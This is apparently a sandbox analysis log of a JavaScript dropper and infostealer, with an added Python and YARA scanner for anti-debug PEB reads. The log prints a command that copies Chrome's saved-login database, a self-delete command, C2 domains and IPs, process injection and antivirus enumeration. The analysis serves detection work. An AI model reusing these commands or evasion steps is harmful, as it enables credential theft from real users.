Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010799BF mov ecx, dword ptr fs:[00000030h] 23_2_010799BF
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010799BF mov eax, dword ptr fs:[00000030h] 23_2_010799BF
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010799BF mov ecx, dword ptr fs:[00000030h] 23_2_010799BF
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010799BF mov ecx, dword ptr fs:[00000030h] 23_2_010799BF
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010799BF mov eax, dword ptr fs:[00000030h] 23_2_010799BF
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_011119D8 mov eax, dword ptr fs:[00000030h] 23_2_011119D8
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0105B1E1 mov eax, dword ptr fs:[00000030h] 23_2_0105B1E1
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0105B1E1 mov eax, dword ptr fs:[00000030h] 23_2_0105B1E1
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_0105B1E1 mov eax, dword ptr fs:[00000030h] 23_2_0105B1E1
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010531E0 mov eax, dword ptr fs:[00000030h] 23_2_010531E0
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010E41E8 mov eax, dword ptr fs:[00000030h] 23_2_010E41E8
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_011289E7 mov eax, dword ptr fs:[00000030h] 23_2_011289E7
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01056800 mov eax, dword ptr fs:[00000030h] 23_2_01056800
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01056800 mov eax, dword ptr fs:[00000030h] 23_2_01056800
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01056800 mov eax, dword ptr fs:[00000030h] 23_2_01056800
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01124015 mov eax, dword ptr fs:[00000030h] 23_2_01124015
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_01124015 mov eax, dword ptr fs:[00000030h] 23_2_01124015
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010D7016 mov eax, dword ptr fs:[00000030h] 23_2_010D7016
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010D7016 mov eax, dword ptr fs:[00000030h] 23_2_010D7016
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010D7016 mov eax, dword ptr fs:[00000030h] 23_2_010D7016
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0001A140 LdrLoadDll, 3_2_0001A140
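The `mov eax, dword ptr fs:[00000030h]` records above are reads of the 32-bit PEB pointer (TEB offset 0x30); the instruction that follows usually picks a PEB field such as BeingDebugged or NtGlobalFlag, which is what makes the pattern an anti-debug lead and why it sits next to the DebugPort queries. The following is an added example, not code from the report or from the sample: a static scanner that finds the same two instruction encodings in a byte buffer, names the PEB field read immediately afterwards, and emits a YARA rule with the same patterns for hunting in unpacked dumps. The function names, the PebAccess record and the SAMPLE bytes are mine; SAMPLE is constructed, not taken from bin.exe.

```python
"""Static scan for the x86 idiom behind the 'mov eax, dword ptr fs:[00000030h]'
records above: fetch the PEB pointer from the TEB, then read a PEB field.
Added example; the sample buffer is constructed, not bytes from bin.exe."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Register numbering used in the ModRM reg field (32-bit).
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Two encodings of "mov r32, dword ptr fs:[30h]":
#   64 A1 30 00 00 00      mov eax, fs:[30h]   (moffs32 short form, eax only)
#   64 8B /r 30 00 00 00   mov r32, fs:[30h]   (ModRM mod=00, rm=101 -> disp32)
PEB_EAX_SHORT = re.compile(rb"\x64\xA1\x30\x00\x00\x00")
PEB_MODRM = re.compile(rb"\x64\x8B([\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00")

# 32-bit PEB fields that anti-debug / evasion code reads right after the fetch.
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x68: "NtGlobalFlag"}


@dataclass
class PebAccess:
    offset: int              # offset of the fs:[30h] read in the buffer
    register: str            # register that receives the PEB pointer
    field: Optional[str]     # PEB field read next, if it is one we know


def _field_read_after(buf: bytes, pos: int, reg: int) -> Optional[str]:
    """Recognise 'mov r8/r32, [reg+disp8]' directly after the PEB fetch.
    8A /r = mov r8, r/m8 ; 8B /r = mov r32, r/m32 ; mod=01 means disp8 follows.
    (rm=100 would need a SIB byte; esp never holds the PEB in practice.)"""
    if pos + 3 > len(buf) or buf[pos] not in (0x8A, 0x8B):
        return None
    modrm = buf[pos + 1]
    if (modrm >> 6) != 0b01 or (modrm & 7) != reg:
        return None
    return PEB_FIELDS.get(buf[pos + 2])


def scan_peb_reads(buf: bytes) -> List[PebAccess]:
    """Return every fs:[30h] read in buf, ordered by offset."""
    hits = []
    for m in PEB_EAX_SHORT.finditer(buf):
        hits.append(PebAccess(m.start(), "eax", _field_read_after(buf, m.end(), 0)))
    for m in PEB_MODRM.finditer(buf):
        reg = (m.group(1)[0] >> 3) & 7
        hits.append(PebAccess(m.start(), REGS[reg], _field_read_after(buf, m.end(), reg)))
    return sorted(hits, key=lambda h: h.offset)


def yara_rule(name: str = "x86_peb_fs30_read") -> str:
    """Same two encodings as a YARA rule, for hunting in unpacked dumps."""
    return (
        f"rule {name} {{\n"
        "    strings:\n"
        "        $peb_short = { 64 A1 30 00 00 00 }\n"
        "        $peb_modrm = { 64 8B (05|0D|15|1D|25|2D|35|3D) 30 00 00 00 }\n"
        "    condition:\n"
        "        any of them\n"
        "}\n"
    )


# Constructed sample: three PEB fetches with the follow-up reads that matter,
# padded with NOPs so the offsets are easy to verify by hand.
SAMPLE = (
    b"\x90" * 4
    + b"\x64\xA1\x30\x00\x00\x00"       # mov eax, fs:[30h]
    + b"\x8A\x40\x02"                   # mov al, [eax+2]    -> BeingDebugged
    + b"\x90" * 3
    + b"\x64\x8B\x0D\x30\x00\x00\x00"   # mov ecx, fs:[30h]
    + b"\x8B\x41\x68"                   # mov eax, [ecx+68h] -> NtGlobalFlag
    + b"\x90" * 2
    + b"\x64\x8B\x15\x30\x00\x00\x00"   # mov edx, fs:[30h]
    + b"\x8B\x42\x0C"                   # mov eax, [edx+0Ch] -> Ldr
    + b"\xC3"                           # ret
)

if __name__ == "__main__":
    for h in scan_peb_reads(SAMPLE):
        print(f"0x{h.offset:04x}: PEB -> {h.register}, then reads {h.field or 'unknown field'}")
    print(yara_rule())
```

A hit is a triage lead, not proof of anti-debugging: compiler runtimes and inlined loader helpers also walk the PEB (the Ldr read is how manual import resolution starts), so the functions worth opening first are the ones where the fetch is followed by a BeingDebugged or NtGlobalFlag read, or that appear many times in the list above.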

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe File created: bin.exe.0.dr
Source: C:\Windows\explorer.exe Domain query: www.ratebill.com
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80
Source: C:\Windows\explorer.exe Domain query: www.muddybootslife.com
Source: C:\Windows\explorer.exe Domain query: www.topings33.com
Source: C:\Windows\explorer.exe Network Connect: 185.53.179.171 80
Source: C:\Windows\explorer.exe Domain query: www.localbloom.online
Source: C:\Windows\explorer.exe Domain query: www.pdwfifi.com
Source: C:\Windows\explorer.exe Domain query: www.rasheedabossmoves.com
Source: C:\Windows\explorer.exe Network Connect: 23.231.99.207 80
Source: C:\Windows\explorer.exe Domain query: www.68chengxinle.com
Source: C:\Windows\explorer.exe Domain query: www.84866.xyz
Source: C:\Windows\explorer.exe Domain query: www.halecamilla.site
Source: C:\Windows\explorer.exe Network Connect: 137.220.133.198 80
Source: C:\Windows\explorer.exe Network Connect: 45.39.111.146 80
Source: C:\Windows\explorer.exe Network Connect: 35.241.47.216 80
Source: C:\Windows\explorer.exe Network Connect: 170.39.76.27 80
Source: C:\Windows\explorer.exe Domain query: www.medyumgalip.com
Source: C:\Windows\explorer.exe Domain query: www.wps-mtb.com
Source: C:\Windows\System32\wscript.exe Domain query: dilshadkhan.duia.ro
Source: C:\Windows\explorer.exe Domain query: www.refreshertowels.com
Source: C:\Windows\explorer.exe Network Connect: 162.0.230.89 80
Source: C:\Windows\explorer.exe Network Connect: 207.174.214.35 80
Source: C:\Windows\explorer.exe Network Connect: 66.235.200.145 80
Source: C:\Windows\explorer.exe Domain query: www.jlbwaterdamagerepairseattle.com
Source: C:\Windows\explorer.exe Domain query: www.sekolahkejepang.com
Source: C:\Windows\explorer.exe Network Connect: 52.17.85.125 80
Source: C:\Windows\explorer.exe Domain query: www.brawlhallacodestore.com
Source: C:\Windows\explorer.exe Domain query: www.hengyuejiguang.com
Source: C:\Windows\explorer.exe Network Connect: 185.134.245.113 80
Source: C:\Windows\explorer.exe Network Connect: 103.247.11.212 80
Source: C:\Windows\System32\wscript.exe Network Connect: 91.193.75.133 6670
Source: C:\Windows\explorer.exe Domain query: www.gafcbooster.com
Source: C:\Windows\explorer.exe Network Connect: 172.67.140.71 80
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: F00000
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bin.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\bin.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\bin.exe Thread register set: target process: 684
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 684
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\wtheeNaAZG.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: explorer.exe, 00000004.00000000.498270430.0000000006100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.615050632.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.488652696.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.614262773.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.615050632.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.524457764.0000000000E38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.615050632.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.488652696.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.525211919.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: YProgram Managerf
Source: explorer.exe, 00000004.00000000.615050632.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.488652696.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.525211919.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
(The two queries above alternate throughout the report: the root\securitycenter2 enumeration is logged 56 times and the root\securitycenter enumeration 55 times, all from the same wscript.exe process.)
Source: wscript.exe, 00000002.00000003.703731399.0000015597A73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.703744618.0000015597A7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.959321094.0000015595506000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: wscript.exe, 00000007.00000002.962073296.0000019175BB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938835842.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.773589121.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \MsMpeng.exe

Stealing of Sensitive Information

Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.bin.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.bin.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.oxx7nkdv4g8.exe.8d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.oxx7nkdv4g8.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000000.888258763.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577518053.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577466338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.577252910.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.539227750.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.981077246.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000001.447624352.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1028333019.0000000004867000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.972949650.0000000000484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.891623399.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451386308.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887276277.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.447599993.000001C6B5DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.515738987.000000000AD27000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887613995.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.447905033.000001C6B609A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.982531208.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.447458593.0000000000011000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.959879577.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.455268485.000001C6B6770000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.452309362.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.454366130.000001C6B5A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448608329.000001C6B5E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.887927975.00000000008D1000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe, type: DROPPED
Source: Yara match File source: 00000002.00000002.959380851.0000015595548000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.964474352.000002A0FC393000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.961147065.0000019173A2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.964554613.000002CA0370B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.961594354.000001559722F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.512701190.000002A0FE195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.961930563.0000019175726000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.990991085.000002CA0506D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.972899634.000002A0FE18A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.964440619.000002A0FC389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.959396798.0000015595552000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.512633458.000002A0FE195000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 7152, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 3576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6416, type: MEMORYSTR
